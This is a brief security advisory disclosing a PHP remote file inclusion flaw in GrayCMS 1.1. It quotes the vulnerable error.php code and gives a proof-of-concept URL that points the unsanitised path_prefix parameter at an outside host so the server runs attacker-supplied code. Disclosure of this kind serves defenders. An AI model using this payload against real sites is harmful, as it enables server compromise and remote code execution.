GrayCMS php code injection

[Kold <maggik@xxxxxxxx>]

Version:  1.1
Severity: High
Vendor:   http://gcms.graymur.net/

Vulnerable code is in "code/error.php":

<----begin---->
...
if (!isset($page)) $page = '';
if (!isset($path_prefix)) $path_prefix = '../';
if (empty($main)) {
  require $path_prefix.'code/main.dat';
}
if (isset($e404) or isset($_GET['e404'])) {

...
}
if (isset($e403) or isset($_GET['e403'])) {
...
}

require $path_prefix.'code/blocks.php';
exit;
<----end---->


PoC: 
http://localhost/CMS/gcms/code/error.php?path_prefix=http://www.kiddiehost.com/
 
mail me:    maggik <at> gala <dot> net
icq:        3316667
greetz to:  ghc, 0xdeadbabe, unl0ck & others